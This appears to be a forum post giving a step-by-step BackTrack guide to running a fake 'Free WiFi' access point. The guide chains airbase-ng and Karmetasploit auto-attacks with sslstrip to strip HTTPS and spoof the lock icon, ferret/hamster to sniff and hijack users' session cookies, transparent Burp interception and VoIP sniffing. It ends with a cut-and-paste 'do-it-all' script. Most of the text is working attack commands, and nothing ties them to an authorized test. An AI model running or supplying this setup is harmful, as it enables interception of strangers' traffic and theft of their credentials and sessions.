We proceed to set a static IP.
Code:
nano /etc/network/interfaces
Edit it to the following (this depends on the network range you are using):
Code:
iface eth0 inet static
address 192.168.1.100
gateway 192.168.1.1
netmask 255.255.255.0
Ctrl+X --> Y to save.
Next, the file /etc/resolv.conf <~ set the DNS
Code:
nano /etc/resolv.conf
and edit it as shown in the screenshot.
Here I use Google's DNS ^^.
Save. Ctrl+X --> Y
Start the networking service and make it start at boot by default
Code:
service networking start
update-rc.d networking defaults
Restart VMware
Code:
init 6
------
Get into Backtrack
Use my bt-customize script not BT's.
1. apt-get update
2. apt-get upgrade
3. apt-get clean
VirtualBox guest Additions…not needed anymore with Defcon 18 BT Release
1. cd /usr/src/linux
2. make-kpkg kernel_headers
3. cd ..
4. dpkg -i linux-headers.blah.blah.deb
5. Steal the VBoxLinuxAdditions-x86.run from the VirtualBox server directory.
6. ./VBoxLinuxAdditions-x86.run
Update Metasploit this step is required.
http://www.metasploit.com/redmine/projects/framework/wiki/Install_BackTrack
$ sudo bash
cd /pentest/svn
rm -rf framework3
svn co https://www.metasploit.com/svn/framework3/trunk framework3
cd /pentest/svn/framework3/external/pcaprub
ruby extconf.rb
make && make install
cd /pentest/svn
svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
cd lorcon2
./configure --prefix=/usr && make && make install
cd /pentest/svn/framework3/external/ruby-lorcon2
ruby extconf.rb
make && make install
Then link it back to the original location
rm /pentest/exploits/framework3
ln -s /pentest/svn/framework3 /pentest/exploits/
To keep it all up to date:
svn update /pentest/svn/framework3/
You need this too:
gem install activerecord sqlite3-ruby
To fire up an access point
http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit
http://adaywithtape.blogspot.com/2009/10/fake-ap-using-airbase-ng.html
airmon-ng start [wifi-interface]
This will create a monitor interface and tell you what it is. Mine is mon0, yours may be different. Use iwconfig to see it.
aireplay-ng --test [monitor-interface] (i.e. mon0)
nano /etc/dhcp3/dhcpd.conf
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
}
nano /etc/default/dhcp3-server
change the interface to "at0" (no not ethX or wlanX…)
to catch every probe request
airbase-ng -P -v
or to advertise a particular network
airbase-ng -P -C 30 -e "Free WiFi" [monitor-interface] (i.e. mon0) -v or -q
Now, when airbase fires up, it creates at0. This at0 is what you use for IP traffic, not wlanX, not ethX…
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
You should now have a running access point. You can now do IP masquerading to serve the nets or do more fun.
Karmetasploit
get karma.rc
1. wget http://metasploit.com/users/hdm/tools/karma.rc
Metasploit auto attack framework:
1. msfconsole -r karma.rc
You need this to keep their shit on your network and not reroute around you and give out net access:
echo 1 > /proc/sys/net/ipv4/ip_forward
### Don't do this shit, it fucks up DNS!!!! --> iptables -t nat -A PREROUTING -i at0 -j REDIRECT
iptables -t nat -A POSTROUTING -o $wan -s 10.0.0.0/24 -j MASQUERADE
Session Sidejacking HTTP/HTTPS:
http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Update your sslstrip
1. wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
2. tar zxvf sslstrip-0.7.tar.gz
3. cd sslstrip-0.7
4. python setup.py install
5. cd ..
6. rm -rf sslstrip-0.7*
Monitors HTTPS, fakes out a "lock" favicon in their browser, kills off old sessions and listens on port 10000 by default.
sslstrip -p -k -f
Reroute shit into sslstrip
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Sniff session cookies
/pentest/sniffers/hamster/ferret -i at0 (or the ethX of the outgoing interface)
Monitor cookie eating
/pentest/sniffers/hamster/hamster
Set up your browser to proxy to 127.0.0.1:1234 and you'll see hamster's interface.
Click on noobs and then on the left you can see their sessions.
Burpsuite 1.3
First set up your firewall to transparently proxy 80 and 443 into Burp.
ipt="/sbin/iptables"
HTTPS Burp Proxy
($honey should be your WLAN interface, probably at0)
honey="at0"
$ipt -t nat -A PREROUTING -i $honey -p tcp --dport 443 -j DNAT --to 10.0.0.1:8080
HTTP Burp Proxy
$ipt -t nat -A PREROUTING -i $honey -p tcp --dport 80 -j DNAT --to 10.0.0.1:8181
(10.0.0.1 is the IP of the WLAN interface)
These lines below are only needed if you are running a NAT firewall.
$ipt -A INPUT -i $honey -p tcp --dport 8080 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp --sport 8080 -j ACCEPT
$ipt -A INPUT -i $honey -p tcp --dport 8181 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp --sport 8181 -j ACCEPT
$ipt -A INPUT -i $honey -p udp --dport 53 -j ACCEPT
$ipt -A OUTPUT -o $honey -p udp --sport 53 -j ACCEPT
$ipt -A INPUT -i $honey -j DROP
$ipt -A OUTPUT -o $honey -j DROP
Forward IP
1. echo "1" > /proc/sys/net/ipv4/ip_forward
Masquerade out
$ipt -t nat -A POSTROUTING -o $wan -s 10.0.0.0/24 -j MASQUERADE
Fire up Burp
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar
Proxy tab->Intercept tab->Turn Intercept off.
Proxy tab->Options tab->delete current listener port.
…then add 8181 and 8080.
…Uncheck listen on loopback port
…check support invisible proxying
Xplico 0.5.6
/etc/init.d/apache2 start
/etc/init.d/xplico start
Now surf to localhost:9876
**Remember, the Backtrack apache2 listens on port 80 and 9876. The NMS LAMPP webserver listens on port 81.
!!!!!!You must turn on LAMPP FIRST then apache2 as LAMPP bitches about another webserver running!!!!!!
Silcd
Edit the /etc/silcd/silcd-primary-ip.conf for your IP you want to listen on.
1. /etc/init.d/silcd start
Pidgin with Silcd
Fire up Pidgin
Add a new account
Basic tab --> enter your nick, IP of the silcd server, password
Advanced tab --> enter the IP of the silcd server for connect server, check use perfect forward secrecy and public key auth.
Hit Save
You should auto connect, it will ask for your password. If not, simply enable/re-enable your account to connect.
Then click Buddies --> Join a chat --> enter a room name to create and an optional password for it.
Ucsniff VOIP sniffer
Will decompress most codecs etc…
ucsniff -i eth0 -M
Do-it-all script, cut and paste: (assumes WiFi on wlan0, WAN is on eth0 and online)
airmon-ng start wlan0
airbase-ng -P mon0 -v
In another terminal:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 10.0.0.0/24 -j MASQUERADE
/etc/init.d/dhcp3-server start
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp --dport 443 -j DNAT --to 10.0.0.1:8080
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to 10.0.0.1:8181
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar